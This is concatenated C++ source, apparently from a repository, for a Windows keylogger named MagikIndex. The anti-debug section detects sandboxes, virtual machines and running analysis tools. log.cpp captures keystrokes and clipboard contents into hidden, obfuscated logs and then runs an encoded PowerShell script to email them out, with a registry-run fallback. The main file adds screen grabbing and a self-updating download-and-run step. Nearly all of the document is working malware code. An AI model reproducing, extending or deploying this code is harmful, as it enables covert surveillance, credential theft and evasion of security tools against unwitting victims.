{ 203 | SYSTEM_INFO siSysInfo; 204 | GetSystemInfo(&siSysInfo); 205 | if (siSysInfo.dwNumberOfProcessors < RequiredCores) { 206 | TrustItem.HasOneCore = true; 207 | return true; 208 | } 209 | return false; 210 | } 211 | bool AntiDBG::MonitorCheck() { 212 | if (GetSystemMetrics(SM_CMONITORS) >= 2) { 213 | TrustItem.HasMultipleMonitors = true; 214 | return true; 215 | } 216 | return false; 217 | } 218 | bool AntiDBG::TimeCheck() { 219 | DWORD Tick = GetTickCount(); 220 | Sleep(5000); 221 | DWORD Tick2 = GetTickCount(); 222 | if ((int)(Tick2 - Tick) < 5000 - (5000 / 10)) { 223 | TrustItem.HasBeenTimepatched = true; 224 | return true; 225 | } 226 | } 227 | bool AntiDBG::InteractionCheck() { 228 | 229 | POINT position1, position2; 230 | LASTINPUTINFO InputInfo; 231 | DWORD Tick; 232 | GetCursorPos(&position1); 233 | Sleep(10000); 234 | GetCursorPos(&position2); 235 | if ((position1.x == position2.x) && (position1.y == position2.y)) { 236 | TrustItem.UserIsInactive = true; 237 | Sleep(5000); 238 | Tick = GetTickCount(); 239 | GetLastInputInfo(&InputInfo); 240 | if (Tick - InputInfo.dwTime > MaxInactivity*1000) { 241 | TrustItem.ExtUserActivity = true; 242 | return true; 243 | } 244 | return false; 245 | } 246 | return false; 247 | } 248 | bool AntiDBG::InternetCheck() { 249 | DWORD DWFlags; 250 | if (InternetGetConnectedState(&DWFlags, NULL)) { 251 | if (InternetCheckConnectionA("https://www.google.com", FLAG_ICC_FORCE_CONNECTION, 0)) { 252 | TrustItem.HasActiveInternet = true; 253 | return true; 254 | }else { 255 | TrustItem.Proxied = true; 256 | return false; 257 | } 258 | } 259 | return false; 260 | } 261 | bool AntiDBG::AMCheck() { 262 | int res = FALSE; 263 | HANDLE hpSnap; 264 | PROCESSENTRY32 pentry; 265 | LPCSTR BannedProcs[] = { 266 | "njZ\\wmZ[{TZdjLYd", 267 | "WIgn7UdjLYd", 268 | "WIgn7EfwX4\\jTo[", 269 | "S\\6XoNn7YcuTY\\{To[", 270 | "WIgn7{e|To[", 271 | "njZ\\wOofVT5ej\\ZS", 272 | "WIgn7UUXT5ej\\Z[", 273 | "WIgn7kf{X4W5\\Y[", 274 | "njZ\\w[5WkX4XqPZ[", 275 | "njZ\\wS5eqPof|P4[", 276 | "njZ\\wOof|DZ[4Hod", 277 | "njZ\\wOof|HYd", 278 | "njZ\\wOof|7YdlHYd", 279 | "njZ\\wOof|TZ[y34dlHYd", 280 | "WIgn7U\\{no\\n\\Yd", 281 | "S\\6XoN|3Ydn\\Yd", 282 | "WIgn7{eyTpfn\\Yd", 283 | "S\\6XoN7Hoe2PYd", 284 | "S\\6XoNyTZ[n\\Yd", 285 | "njZ\\wSIdnnIc|PYV" 286 | }; 287 | hpSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); 288 | if (hpSnap != INVALID_HANDLE_VALUE) { 289 | pentry.dwSize = sizeof(PROCESSENTRY32); 290 | } 291 | else { 292 | return false; 293 | } 294 | 295 | if (!Process32First(hpSnap, &pentry)) { 296 | CloseHandle(hpSnap); 297 | return false; 298 | } 299 | 300 | do { 301 | for (int i = 0; i < 20; i++) { //deploy dynamic size thanks 302 | if (lstrcmpi(pentry.szExeFile, BannedProcs[i]) == 0) { 303 | TrustItem.HasRunningAntiMalware = true; 304 | return true; 305 | } 306 | } 307 | } while (Process32Next(hpSnap, &pentry)); 308 | return false; 309 | } 310 | bool AntiDBG::AppCheck() { 311 | HANDLE hFind; 312 | WIN32_FIND_DATAA data; 313 | 314 | char Directory[MAX_PATH] = "C:\\Program Files\\*.*"; 315 | 316 | int FileCounter = 0; 317 | 318 | char FilePath[MAX_PATH + 1]; 319 | DWORD FileSize = MAX_PATH + 1; 320 | 321 | hFind = FindFirstFileA(Directory, &data); 322 | if (hFind != INVALID_HANDLE_VALUE) { 323 | do { 324 | //GetFinalPathNameByHandleA(hFind, FilePath, FileSize, 0x0); 325 | //if (!(GetFileAttributesA(FilePath) & FILE_ATTRIBUTE_DIRECTORY)) { 326 | FileCounter++; 327 | //} 328 | } while (FindNextFileA(hFind, &data)); 329 | FindClose(hFind); 330 | } 331 | if (FileCounter >= MinRequiredApps) { 332 | TrustItem.HasMoreThan20Apps = true; 333 | return true; 334 | } 335 | return false; 336 | } 337 | bool AntiDBG::HaboCucker() { 338 | char FileName[MAX_PATH]; 339 | GetModuleFileNameA(NULL, FileName, MAX_PATH); 340 | std::string RetString; 341 | for (int i = 0; i < strlen(FileName); i++) { 342 | RetString += FileName[i]; 343 | RetString = (FileName[i] == '\\') ? "" : RetString; 344 | } 345 | if (strcmp("996e.exe", RetString.c_str()) == 0) { 346 | TrustItem.IsInHabo = true; 347 | return true; 348 | } 349 | return false; 350 | } 351 | BOOL AntiDBG::BreakpointChecker() { 352 | __try 353 | { 354 | __debugbreak(); 355 | } 356 | __except (EXCEPTION_EXECUTE_HANDLER) 357 | { 358 | return false; 359 | } 360 | return true; 361 | } 362 | BOOL AntiDBG::BreakpointChecker2() { 363 | __try 364 | { 365 | RaiseException(DBG_PRINTEXCEPTION_C, 0, 0, 0); 366 | } 367 | __except (GetExceptionCode() == DBG_PRINTEXCEPTION_C) 368 | { 369 | return false; 370 | } 371 | 372 | return true; 373 | } 374 | bool AntiDBG::HybridCucker() {/* 375 | char PathToFile[MAX_PATH]; 376 | HMODULE GetModH = GetModuleHandle(NULL); 377 | GetModuleFileNameA(GetModH, PathToFile, sizeof(PathToFile)); 378 | std::string::size_type pos = std::string(PathToFile).find_last_of("\\/"); 379 | std::string CurrentDir = std::string(PathToFile).substr(0, pos); 380 | char* AppData = nullptr; 381 | size_t AppDataSize; 382 | _dupenv_s(&AppData, &AppDataSize, "HOMEPATH"); 383 | std::string AdobePath = AppData; 384 | AdobePath += "\\Desktop\\Acrobat Reader DC.lnk"; 385 | if (IsWindows7OrGreater && !IsWindows8OrGreater) { 386 | if (CurrentDir == "C:\\") { 387 | //if (fexists(AdobePath)) 388 | return true; 389 | } 390 | }*/ 391 | HANDLE hpSnap; 392 | PROCESSENTRY32 pentry; 393 | hpSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); 394 | if (hpSnap != INVALID_HANDLE_VALUE) { 395 | pentry.dwSize = sizeof(PROCESSENTRY32); 396 | } 397 | else { 398 | return false; 399 | } 400 | if (!Process32First(hpSnap, &pentry)) { 401 | CloseHandle(hpSnap); 402 | return false; 403 | } 404 | if (VMGFileCheck()) { 405 | do { 406 | if (pentry.szExeFile == "AutoIt3.exe") 407 | return true; 408 | } while (Process32Next(hpSnap, &pentry)); 409 | } 410 | return false; 411 | } 412 | bool AntiDBG::PowerCheck() { 413 | SYSTEM_POWER_STATUS SysPowerStatus; 414 | if (GetSystemPowerStatus(&SysPowerStatus) != 0) { 415 | if (SysPowerStatus.BatteryFlag != 128 && SysPowerStatus.BatteryFlag != 255) 416 | return true; 417 | } 418 | return false; 419 | } -------------------------------------------------------------------------------- /log.cpp: -------------------------------------------------------------------------------- 1 | #include "common.h" 2 | 3 | #pragma warning( push ) 4 | #pragma warning( disable : 6284 ) 5 | #pragma warning( disable : 6387 ) 6 | std::set getAllThreadIds(); 7 | template HRESULT CopyItems(__in InputIterator first, __in InputIterator last, __in PCSTR dest); 8 | FILE* OUTPUT_FILE; 9 | bool Caps = false; 10 | 11 | 12 | std::string Log::EncryptMyString(std::string UnencryptedString) { 13 | std::string CryptedString = {}; 14 | std::string temp; 15 | std::string ThrowAwayKey; 16 | ThrowAwayKey += (char)(rand() % KeyShiftLimit + 1); 17 | for (int r = 0; r < UnencryptedString.size(); r++) { 18 | *(((CryptedString??(r??)??'CryptedString??(r??)) not_eq 1) ? &CryptedString : &ThrowAwayKey) += (UnencryptedString[r] + (int)ThrowAwayKey[0] + ((UnencryptedString[r] % 2 == 0) ? 1 : 3) + (((int)ThrowAwayKey[0] % 2 == 0) ? 1 : 0)); 19 | } 20 | Base64::encode(ThrowAwayKey, &temp); 21 | CryptedString += temp; 22 | CryptedString += ';'; 23 | return CryptLogs ? CryptedString : UnencryptedString; 24 | } 25 | 26 | void Log::LogItInt(int key_stroke) { 27 | if (key_stroke == 1 || key_stroke == 2) 28 | return; 29 | if (key_stroke == VK_MBUTTON || key_stroke == VK_XBUTTON1 || key_stroke == VK_XBUTTON2 || key_stroke == 7) 30 | return; 31 | 32 | fopen_s(&OUTPUT_FILE, log.c_str(), "a+"); 33 | 34 | //std::cout << key_stroke << std::endl; 35 | 36 | switch (key_stroke) { //fix OEMX keys by checking for shift and keyb layout 37 | case VK_OEM_COPY: 38 | fprintf(OUTPUT_FILE, "%s", EncryptMyString("[COPY]")); 39 | break; 40 | case VK_BACK: 41 | fprintf(OUTPUT_FILE, "%s", EncryptMyString("[BACKSPACE]")); 42 | break; 43 | case 13: 44 | fprintf(OUTPUT_FILE, "%s", EncryptMyString("\n")); 45 | break; 46 | case 32: 47 | fprintf(OUTPUT_FILE, "%s", EncryptMyString(" ")); 48 | break; 49 | case VK_LWIN: 50 | fprintf(OUTPUT_FILE, "%s", EncryptMyString("[WIN]")); 51 | break; 52 | case 9: 53 | fprintf(OUTPUT_FILE, "%s", EncryptMyString("[TAB]")); 54 | break; 55 | case VK_CAPITAL: 56 | fprintf(OUTPUT_FILE, "%s", EncryptMyString("[CAPS LOCK]")); 57 | Caps = !Caps; 58 | break; 59 | case -95: 60 | case -96: 61 | case VK_LSHIFT: 62 | case VK_RSHIFT: 63 | fprintf(OUTPUT_FILE, "%s", EncryptMyString("[SHIFT]")); 64 | break; 65 | case VK_RCONTROL: 66 | case VK_LCONTROL: 67 | case VK_CONTROL: 68 | if (GetKeyState('V') < 0) { 69 | fprintf(OUTPUT_FILE, "%s", EncryptMyString("[PASTE]")); 70 | fprintf(OUTPUT_FILE, "%s", EncryptMyString(GetClipBoardTxt())); 71 | break; 72 | } 73 | if (GetKeyState('C') < 0) { 74 | fprintf(OUTPUT_FILE, "%s", EncryptMyString("[COPY]")); 75 | break; 76 | } 77 | fprintf(OUTPUT_FILE, "%s", EncryptMyString("[CONTROL]")); //later check for clipboard 78 | break; 79 | case 27: 80 | fprintf(OUTPUT_FILE, "%s", EncryptMyString("[ESCAPE]")); 81 | break; 82 | case VK_END: 83 | fprintf(OUTPUT_FILE, "%s", EncryptMyString("[END]")); 84 | break; 85 | case VK_HOME: 86 | fprintf(OUTPUT_FILE, "%s", EncryptMyString("[HOME]")); 87 | break; 88 | case VK_INSERT: 89 | fprintf(OUTPUT_FILE, "%s", EncryptMyString("[INSERT]")); 90 | break; 91 | case 46: 92 | fprintf(OUTPUT_FILE, "%s", EncryptMyString("[DELETE]")); 93 | break; 94 | case 37: 95 | fprintf(OUTPUT_FILE, "%s", EncryptMyString("[LEFT]")); 96 | break; 97 | case 38: 98 | fprintf(OUTPUT_FILE, "%s", EncryptMyString("[UP]")); 99 | break; 100 | case 39: 101 | fprintf(OUTPUT_FILE, "%s", EncryptMyString("[RIGHT]")); 102 | break; 103 | case 40: 104 | fprintf(OUTPUT_FILE, "%s", EncryptMyString("[DOWN]")); 105 | break; 106 | /*case VK_OEM_2: 107 | fprintf(OUTPUT_FILE, "%s", EncryptMyString("[OEM2( /? )]")); 108 | break;*/ 109 | case VK_OEM_3: 110 | fprintf(OUTPUT_FILE, "%s", EncryptMyString("[OEM3( ]} )]")); 111 | break; 112 | case VK_OEM_4: 113 | fprintf(OUTPUT_FILE, "%s", EncryptMyString("[OEM4( '\" )]")); 114 | break; 115 | case VK_OEM_5: 116 | fprintf(OUTPUT_FILE, "%s", EncryptMyString("[OEM5]")); 117 | break; 118 | /*case VK_OEM_6: 119 | fprintf(OUTPUT_FILE, "%s", EncryptMyString("[OEM6( <> )]")); 120 | break;*/ 121 | case 190: 122 | case 110: 123 | fprintf(OUTPUT_FILE, "%s", EncryptMyString(".")); 124 | break; 125 | default: 126 | if ((GetKeyState(VK_SHIFT) < 0) == Caps) { 127 | if (key_stroke >= 'A' && key_stroke <= 'Z') 128 | key_stroke += 32; 129 | } 130 | else { 131 | switch (key_stroke) { 132 | case 48: 133 | fprintf(OUTPUT_FILE, "%s", EncryptMyString(")")); 134 | goto fclose; 135 | case 49: 136 | fprintf(OUTPUT_FILE, "%s", EncryptMyString("!")); 137 | goto fclose; 138 | case 50: 139 | fprintf(OUTPUT_FILE, "%s", EncryptMyString("@")); 140 | goto fclose; 141 | case 51: 142 | fprintf(OUTPUT_FILE, "%s", EncryptMyString("#")); 143 | goto fclose; 144 | case 52: 145 | fprintf(OUTPUT_FILE, "%s", EncryptMyString("$")); 146 | goto fclose; 147 | case 53: 148 | fprintf(OUTPUT_FILE, "%s", EncryptMyString("%")); 149 | goto fclose; 150 | case 54: 151 | fprintf(OUTPUT_FILE, "%s", EncryptMyString("^")); 152 | goto fclose; 153 | case 55: 154 | fprintf(OUTPUT_FILE, "%s", EncryptMyString("&")); 155 | goto fclose; 156 | case 56: 157 | fprintf(OUTPUT_FILE, "%s", EncryptMyString("*")); 158 | goto fclose; 159 | case 57: 160 | fprintf(OUTPUT_FILE, "%s", EncryptMyString("(")); 161 | goto fclose; 162 | case -64: 163 | fprintf(OUTPUT_FILE, "%s", EncryptMyString("~")); 164 | goto fclose; 165 | case -67: 166 | fprintf(OUTPUT_FILE, "%s", EncryptMyString("_")); 167 | goto fclose; 168 | case -69: 169 | fprintf(OUTPUT_FILE, "%s", EncryptMyString("+")); 170 | goto fclose; 171 | case -70: 172 | fprintf(OUTPUT_FILE, "%s", EncryptMyString(":")); 173 | goto fclose; 174 | case -34: 175 | fprintf(OUTPUT_FILE, "%s", EncryptMyString("\"")); 176 | goto fclose; 177 | case -68: 178 | fprintf(OUTPUT_FILE, "%s", EncryptMyString("<")); 179 | goto fclose; 180 | case -66: 181 | fprintf(OUTPUT_FILE, "%s", EncryptMyString(">")); 182 | goto fclose; 183 | case -65: 184 | fprintf(OUTPUT_FILE, "%s", EncryptMyString("?")); 185 | goto fclose; 186 | } 187 | } 188 | if (CryptLogs) { 189 | std::string Temp; 190 | Temp += (char)key_stroke; 191 | fprintf(OUTPUT_FILE, "%s", EncryptMyString(Temp)); 192 | } 193 | else 194 | fprintf(OUTPUT_FILE, "%s", &key_stroke); 195 | break; 196 | 197 | } 198 | fclose: 199 | fclose(OUTPUT_FILE); 200 | } 201 | 202 | void Log::LogItChar(std::string Value) { 203 | Value += "\n"; 204 | std::ofstream File; 205 | File.open(log, std::ios_base::app); 206 | File << EncryptMyString(Value); 207 | File.close(); 208 | } 209 | 210 | void createLogFile(const std::string& filename, const std::string& line1, const std::string& line2, const std::string& line3, const std::string& line4, const std::string& line5) { 211 | // Create the file with the FILE_ATTRIBUTE_HIDDEN attribute 212 | HANDLE file = CreateFileA(filename.c_str(), GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_HIDDEN, NULL); 213 | // Write the first line to the file 214 | DWORD writtenBytes; 215 | WriteFile(file, line1.c_str(), (DWORD)line1.size(), &writtenBytes, NULL); 216 | WriteFile(file, "\r\n", 2, &writtenBytes, NULL); 217 | 218 | WriteFile(file, line2.c_str(), (DWORD)line2.size(), &writtenBytes, NULL); 219 | WriteFile(file, "\r\n", 2, &writtenBytes, NULL); 220 | 221 | WriteFile(file, line3.c_str(), (DWORD)line3.size(), &writtenBytes, NULL); 222 | WriteFile(file, "\r\n", 2, &writtenBytes, NULL); 223 | 224 | WriteFile(file, line4.c_str(), (DWORD)line4.size(), &writtenBytes, NULL); 225 | WriteFile(file, "\r\n", 2, &writtenBytes, NULL); 226 | 227 | WriteFile(file, line5.c_str(), (DWORD)line5.size(), &writtenBytes, NULL); 228 | WriteFile(file, "\r\n", 2, &writtenBytes, NULL); 229 | // Close the file 230 | CloseHandle(file); 231 | } 232 | /*void CompressFile(std::string Path) { 233 | DWORD WrittenBytes; 234 | char FileBufferer[1000 + CharactersPerLog]; 235 | std::string FileBuffer; 236 | 237 | 238 | std::ifstream InputFile(Path, std::ios::binary); 239 | while (!InputFile.eof()) { 240 | std::getline(InputFile, FileBuffer, '\0'); 241 | } 242 | InputFile.close(); 243 | DeleteFileA(Path.c_str()); 244 | LZ4_compress_default(FileBuffer.c_str(), FileBufferer, FileBuffer.size(), strlen(FileBufferer)); 245 | HANDLE LZ4File = CreateFileA(Path.c_str(), GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_DELETE | FILE_SHARE_WRITE, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL); 246 | WriteFile(LZ4File, FileBufferer, strlen(FileBufferer), &WrittenBytes, NULL); 247 | CloseHandle(LZ4File); 248 | }*/ 249 | 250 | void Log::SendLog() { 251 | SetFileAttributesA(log.c_str(), FILE_ATTRIBUTE_HIDDEN); 252 | std::string ZipPath = log; 253 | //ZipPath += ".zip"; // remove or disable this 254 | //FILE* f = fopen(ZipPath.c_str(), "wb"); // if you dont want the 255 | //fwrite("\x50\x4B\x05\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 22, 1, f); // log txt file to 256 | //fclose(f); // become zipped. 257 | const char* files[] = { 258 | log.c_str() 259 | }; 260 | { 261 | CoInitialize(NULL); 262 | CopyItems(std::cbegin(files), std::cend(files), ZipPath.c_str()); 263 | CoUninitialize(); 264 | } 265 | char tempPath[MAX_PATH]; 266 | GetEnvironmentVariable("TEMP", tempPath, MAX_PATH); 267 | std::string fullPath = tempPath; 268 | std::string Filename = "mat-debug-"; 269 | Filename += std::to_string(rand() % 10000 + 1000); 270 | Filename += ".log"; 271 | fullPath += "\\" + Filename; 272 | createLogFile(fullPath, SendersEmail, SendersPsw, ZipPath, LogSubject, LogBody); //if you want to not zip the file, change to "ZipPath" to "log" 273 | 274 | std::string Command = "/C powershell "; 275 | char SysDir[MAX_PATH]; 276 | GetSystemDirectoryA(SysDir, MAX_PATH); 277 | DWORD WrittenBytes, DWFlags; 278 | char* AppData = nullptr; 279 | size_t AppDataSize; 280 | strcat_s(SysDir, MAX_PATH, "\\cmd.exe"); 281 | _dupenv_s(&AppData, &AppDataSize, "APPDATA"); 282 | std::string Powershell = AppData; 283 | Powershell += "\\MicrosoftDebug\\PSScript"; 284 | Powershell += std::to_string(GetTickCount()); 285 | Powershell += ".PS1"; 286 | std::string PSStartup = "MicrosoftDebug"; 287 | PSStartup += std::to_string(GetTickCount()); 288 | HANDLE PS1File = CreateFileA(Powershell.c_str(), GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_DELETE | FILE_SHARE_WRITE, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL); 289 | std::string a = "$credsPath = \"$env:TEMP\\"; 290 | a += Filename; 291 | a += "\"\n"; 292 | a += HardDecode("ShMSZc6XoE9rS\\|zY\\M2pE2nIgnrS\\vHoVw;Yc2H4[x\\pdL7kdxnIfjP4d47WU73GLi2Y\\2nWNn\\5dvXoWMW4[{;oTvCEc2HIW|TY\\{PILi2Y\\2nWNn\\5dvXoWMmEdrHYdHTpexDZ\\UTEMm7Y\\V7{do7YUSTXVVTkEriIfjDHerrHLqSI\\D7{e27Y\\vj4[jTJfD7EdrHYdHTpexDZ\\UTkE7T4dETEK;CUgm;oSwyYcj3YT2L5dyXoWmqCflXockX5WmCURiS5[nro[3PnNunY[vXGf{;IenLHLMmEdrHYdnTEMmTYSw:IXwyYcj3YT2L5dyXoWmqCdrHYdnTEK;CUdxLpTwyYcj3YT2L5dyXoWmqS\\pH4e|XYVunY[P7EdrHYVwSZ\\Q7UdnT5e7PHK2PY\\sL4VveZ\\QDURiyYcj3YT2L5dyXoWmqSMmL5d5P5ejDJLiyEdrHYdnTEMuHYc27Y\\mXoeFvoexfJfn7mN2XoVw2Y\\2PZgVDEflXock;WN5XoVi2FK|zY[rTpdnTY\\{PmNx\\odLDHXPPHLMWYf{TJLi2FKuP5Wnzo[j7YTw:o\\wnGWW32WmqSM5iVPiyken\\penPHe234WmiEfwXYcuPGe234WwyYcj3mN2XoViS5[nro[R3{fn7GK;C{do7YUSTXVVTkEp24dl7EdrHYdp7Ee234epCURiKZ\\4LZ\\VDHXPPHLMupErWodrzodxTEMi[YcMSZ\\rXZWvCUOiSpd3;4SvCEQwilN66EQi64drT5[n7odxPYN2PZ\\2DURiWodrzodxTkEfT|Y|XodrzILi2FK7T4dETkEfP|Y|XodrzILi2FK2PY\\sLYfVTkEfL|Y|XodrzILi2FKqTZ[SDZccTkEfH|Y|XodrzILi2FKmL5d5P5ejDJLM2HOdPZ\\wnIdmCURiyYcj3Y\\mqCc2HIW|TY\\{PILiSpdnTpdxPWN2X4Ti2FK|XodrzIL"); 293 | 294 | WriteFile(PS1File, a.c_str(), (DWORD)strlen(a.c_str()), &WrittenBytes, NULL); 295 | CloseHandle(PS1File); 296 | Command = SysDir; 297 | Command += " /C PowerShell.exe -ExecutionPolicy Unrestricted -command \""; 298 | Command += Powershell; 299 | Command += "\""; 300 | if (!InternetGetConnectedState(&DWFlags, NULL)) { 301 | CreateRegistryKey(PSStartup.c_str(), Command.c_str()); 302 | } 303 | else { 304 | //LogItChar("Connected to the internet, sending the log...", CurrentLog); 305 | //system(Command.c_str()); 306 | ShellExecuteA(NULL, "open", SysDir, Command.c_str(), NULL, SW_HIDE); 307 | std::this_thread::sleep_for(std::chrono::seconds(3)); 308 | DeleteDirectory(fullPath); 309 | } 310 | } 311 | 312 | void Log::CreateLog() { 313 | 314 | 315 | DWORD Tick = GetTickCount(); 316 | char* AppData = nullptr; 317 | size_t AppDataSize; 318 | _dupenv_s(&AppData, &AppDataSize, "APPDATA"); 319 | 320 | char PathToFile[MAX_PATH]; 321 | HMODULE GetModH = GetModuleHandle(NULL); 322 | GetModuleFileNameA(GetModH, PathToFile, sizeof(PathToFile)); 323 | 324 | std::string LogTime = std::to_string(Tick); 325 | 326 | std::string CurrentLog = AppData; 327 | CurrentLog += "\\MicrosoftDebug"; 328 | 329 | CreateDirectoryA(CurrentLog.c_str(), NULL); 330 | 331 | SetFileAttributesA(CurrentLog.c_str(), FILE_ATTRIBUTE_HIDDEN); 332 | if (CalculateDirSize(CurrentLog) > MaximumFolderLog) 333 | { 334 | DeleteDirectory(CurrentLog); //? trying to delete too many logs 335 | Sleep(200); 336 | CreateDirectoryA(CurrentLog.c_str(), NULL); 337 | SetFileAttributesA(CurrentLog.c_str(), FILE_ATTRIBUTE_HIDDEN); 338 | } 339 | CurrentLog += "\\Log"; 340 | CurrentLog += LogTime; 341 | CurrentLog += ".txt"; 342 | log = CurrentLog; 343 | } 344 | 345 | 346 | std::set getAllThreadIds() 347 | { 348 | auto processId = GetCurrentProcessId(); 349 | auto currThreadId = GetCurrentThreadId(); 350 | std::set thread_ids; 351 | std::unique_ptr< void, decltype(&CloseHandle) > h(CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0), CloseHandle); 352 | if (h.get() != INVALID_HANDLE_VALUE) 353 | { 354 | THREADENTRY32 te; 355 | te.dwSize = sizeof(te); 356 | if (Thread32First(h.get(), &te)) 357 | { 358 | do 359 | { 360 | if (te.dwSize >= (FIELD_OFFSET(THREADENTRY32, th32OwnerProcessID) + sizeof(te.th32OwnerProcessID))) 361 | { 362 | //only enumerate threads that are called by this process and not the main thread 363 | if ((te.th32OwnerProcessID == processId) && (te.th32ThreadID != currThreadId)) 364 | { 365 | thread_ids.insert(te.th32ThreadID); 366 | } 367 | } 368 | te.dwSize = sizeof(te); 369 | } while (Thread32Next(h.get(), &te)); 370 | } 371 | } 372 | return thread_ids; 373 | } 374 | 375 | template 376 | HRESULT CopyItems(__in InputIterator first, __in InputIterator last, __in PCSTR dest) 377 | { 378 | _COM_SMARTPTR_TYPEDEF(IShellDispatch, IID_IShellDispatch); 379 | _COM_SMARTPTR_TYPEDEF(Folder, IID_Folder); 380 | IShellDispatchPtr shell; 381 | FolderPtr destFolder; 382 | 383 | variant_t dirName, fileName, options; 384 | 385 | HRESULT hr = CoCreateInstance(CLSID_Shell, NULL, CLSCTX_INPROC_SERVER, IID_IShellDispatch, (void**)&shell); 386 | if (SUCCEEDED(hr)) 387 | { 388 | dirName = dest; 389 | hr = shell->NameSpace(dirName, &destFolder); 390 | if (SUCCEEDED(hr)) 391 | { 392 | auto existingThreadIds = getAllThreadIds(); 393 | options = FOF_SILENT | FOF_NOCONFIRMATION | FOF_NOERRORUI; //NOTE: same result as 0x0000 394 | while (first != last) 395 | { 396 | fileName = *first; 397 | printf("Copying %s to %s ...\n", *first, dest); 398 | ++first; 399 | hr = destFolder->CopyHere(fileName, options); //NOTE: this appears to always return S_OK even on error 400 | 401 | auto updatedThreadIds = getAllThreadIds(); 402 | std::vector newThreadIds; 403 | std::set_difference(updatedThreadIds.begin(), updatedThreadIds.end(), existingThreadIds.begin(), existingThreadIds.end(), std::back_inserter(newThreadIds)); 404 | 405 | std::vector threads; 406 | for (auto threadId : newThreadIds) 407 | threads.push_back(OpenThread(SYNCHRONIZE, FALSE, threadId)); 408 | 409 | if (!threads.empty()) 410 | { 411 | // Waiting for new threads to finish not more than 5 min. 412 | WaitForMultipleObjects((DWORD)threads.size(), &threads[0], TRUE, 5 * 60 * 1000); 413 | 414 | for (size_t i = 0; i < threads.size(); i++) 415 | CloseHandle(threads[i]); 416 | } 417 | } 418 | } 419 | } 420 | return hr; 421 | } 422 | 423 | std::string GetClipBoardTxt() { 424 | LPSTR lpstr; 425 | HGLOBAL hglb; 426 | char ClipBuffer[10000]; 427 | if (!IsClipboardFormatAvailable(CF_TEXT)) 428 | return "\nError retrieving clipboard format (the copied data wasn't text).\n"; 429 | if (!OpenClipboard(NULL)) 430 | return "\nError opening clipboard.\n"; 431 | hglb = GetClipboardData(CF_TEXT); 432 | if (hglb != NULL) 433 | { 434 | lpstr = (LPSTR)GlobalLock(hglb); 435 | if (lpstr != NULL) 436 | { 437 | strcpy_s(ClipBuffer, sizeof(ClipBuffer), (char*)hglb); 438 | GlobalUnlock(hglb); 439 | } 440 | } 441 | CloseClipboard(); 442 | std::string Ret = ClipBuffer; 443 | Ret += '\0'; 444 | return Ret; 445 | } 446 | -------------------------------------------------------------------------------- /MagikIndex.cpp: -------------------------------------------------------------------------------- 1 | #include "common.h" 2 | #include "logo.h" 3 | 4 | 5 | #pragma warning( push ) 6 | #pragma warning( disable : 4477 ) 7 | 8 | int Counter, Counter2; 9 | bool mutex, mutex2; 10 | static Log MyLog; 11 | 12 | int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, PSTR lpCmdLine, int nCmdShow) 13 | { 14 | 15 | CreateMutexA(0, FALSE, "Local\\$MagikIndex$"); 16 | if (GetLastError() == ERROR_ALREADY_EXISTS) { 17 | exit(0); 18 | } 19 | 20 | SetPriorityClass(GetCurrentProcess(), BELOW_NORMAL_PRIORITY_CLASS); 21 | 22 | DWORD Tick1 = GetTickCount(); 23 | int RandSeed = (int)time(NULL) * Tick1 * GetCurrentProcessId() * (DWORD)RandomGenerator(); 24 | srand(RandSeed); 25 | 26 | bool ThrowAwayFlag = false; 27 | char PathToFile[MAX_PATH]; 28 | HMODULE GetModH = GetModuleHandle(NULL); 29 | GetModuleFileNameA(GetModH, PathToFile, sizeof(PathToFile)); 30 | std::string::size_type pos = std::string(PathToFile).find_last_of("\\/"); 31 | std::string CurrentDir = std::string(PathToFile).substr(0, pos); 32 | /*if (SecurityLevel == 3 && StrStrA(GetCommandLineA(),"rebooted") == NULL) { //why did i put this here kekw 33 | RegisterMyProgramForStartup("MIndex",PathToFile,"rebooted"); 34 | exit(0); 35 | }*/ 36 | 37 | if (DelayExecution) { 38 | int Divider = 20, DividedSleep = (DelayTime + rand() % 100 + 10) / Divider; 39 | //LARGE_INTEGER delay; 40 | //delay.QuadPart = -10000 * (DividedSleep * 1000); 41 | //pNtDelayExecution(FALSE, &delay); 42 | for (int j = 0; j <= Divider; j++) { 43 | Sleep(DividedSleep); 44 | } 45 | } 46 | 47 | if (ShatterAttack) { 48 | unsigned long ThreadId; 49 | CreateThread(NULL, 0, Protect, 0, 0, &ThreadId); 50 | } 51 | 52 | bool FirstLog = true; 53 | if (ScreenGrab) { 54 | unsigned long ThreadId2; 55 | CreateThread(NULL, 0, ScreenGrabber, 0, 0, &ThreadId2); 56 | } 57 | 58 | __AsmImpossibleDisassm(); 59 | __AsmJmpSameTarget(); 60 | 61 | AntiDBG DebugItem; 62 | DebugItem.Initialize(); 63 | TrustItems Trust = DebugItem.TrustItem; 64 | bool TrustTooLow = false; 65 | if ((SecurityLevel + 1) * 25 > DebugItem.trust) { 66 | if (QuitIfUntrust) { 67 | exit(0); 68 | } 69 | TrustTooLow = true; 70 | } 71 | else if (Trust.HasActiveInternet && !Trust.IsInVM) { 72 | std::string VersionFile = CurrentDir + "\\Version.inf"; 73 | std::string UpdatedExe = CurrentDir + "\\MagikIndekkusu.exe"; 74 | std::string UpdateLink; 75 | VersionDownload: 76 | URLDownloadToFileA(NULL, HardDecode(GitVersionLink).c_str(), VersionFile.c_str(), 0, NULL); 77 | SetFileAttributesA(VersionFile.c_str(), FILE_ATTRIBUTE_HIDDEN); 78 | std::ifstream VersionFileIO(VersionFile); 79 | if (!VersionFileIO.eof()) { 80 | std::getline(VersionFileIO, UpdateLink, '\n'); 81 | //VersionFile.erase(VersionFile.size() - 1); 82 | if (strcmp(UpdateLink.c_str(), CurrentVersion) != 0) { 83 | std::getline(VersionFileIO, UpdateLink, '\n'); 84 | URLDownloadToFile(NULL, UpdateLink.c_str(), UpdatedExe.c_str(), 0, NULL); 85 | SetFileAttributesA(UpdatedExe.c_str(), FILE_ATTRIBUTE_HIDDEN); 